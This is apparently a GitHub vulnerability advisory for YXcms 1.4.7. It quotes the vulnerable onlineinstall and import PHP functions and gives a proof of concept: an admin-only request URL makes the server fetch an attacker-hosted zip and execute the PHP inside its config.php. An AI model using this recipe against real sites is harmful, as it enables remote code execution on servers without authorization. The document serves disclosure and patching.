Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
There is a Any PHP Code Execution security vulnerablity in YXcms 1.4.7
Description:
Any PHP Code Execution vulnerability in /WWW/YXcmsApp1.4.7/protected/apps/appmanage/controller/indexController.php allow remote attackers to exeute any PHP code.
Condition:
You should be a Administrator(Obtain passwords and accounts via weak passwords or social engineering)
The Cause of the vulnerability:
There is a bug function in line 203th of this script, as shown in the following code:
public function onlineinstall(){
$url = $_GET['url'];//在线安装地址
if( empty($url) ){
$this->error('参数传递错误');
}
$content = file_get_contents($url);
if( empty($content) ){
$this->error('数据下载错误');
}
$zip_file = BASE_PATH . 'cache/tmp/' .md5($url) .'.zip';
if( file_put_contents($zip_file, $content) ){
$this->import($zip_file);
}else{
$this->error('数据写入错误');
}
}
and this in line 79th of this script, as shown in the following code:
public function import($zip_file=''){
if(empty($zip_file)){
if( !$this->isPost() ){
$this->display();
return true;
}
if($_FILES['file']['size'] < 0){
$this->error('请选择文件');
}
$zip_file = $_FILES['file']['tmp_name'];
}
$zip_dir = BASE_PATH . 'cache/tmp/' .md5($zip_file) .'/';
if(substr($zip_dir,0,1)=="/") $zip_dir='.'.$zip_dir; //无法获得绝对路径情况
$zip = new Zip();
$zip->decompress($zip_file, $zip_dir);
@unlink($zip_file);
//获取app名称
$app = '';
$arr = glob($zip_dir .'*/config.php');
if( !empty($arr) ){
if( preg_match('#/([a-z0-9]+)/config.php#', $arr[0], $matches)){
$app = $matches[1];
}
}
if( empty($app) ){
del_dir($zip_dir);
$this->error('安装包格式错误!');
}
//判断应用是否已经存在
$app_path = BASE_PATH . 'apps/' . $app . '/';
if( is_dir($app_path) ){
del_dir($zip_dir);
$this->error($app .'应用已存在,请先卸载!');
}
//将数据拷贝到apps目录
copy_dir($zip_dir . $app , $app_path);
del_dir($zip_dir);
//执行安装
$_GET['app'] = $app;
$this->install();
}
POC:
First we should have a zip file on any website which containing a folder, and in this folder we should have a file named 'config.php'
this folder is like this:
aaa.zip-+----aaa+-----config.php
| |
| +-----
|
+----
We can write any PHP code in this config.php.
Then visit the link http://127.0.0.1/index.php?r=appmanage/index/onlineinstall&url=http://127.0.0.1/aaa.zip
, we can see our PHP code has been executed in a short time
Repair method:
check the evil code in config.php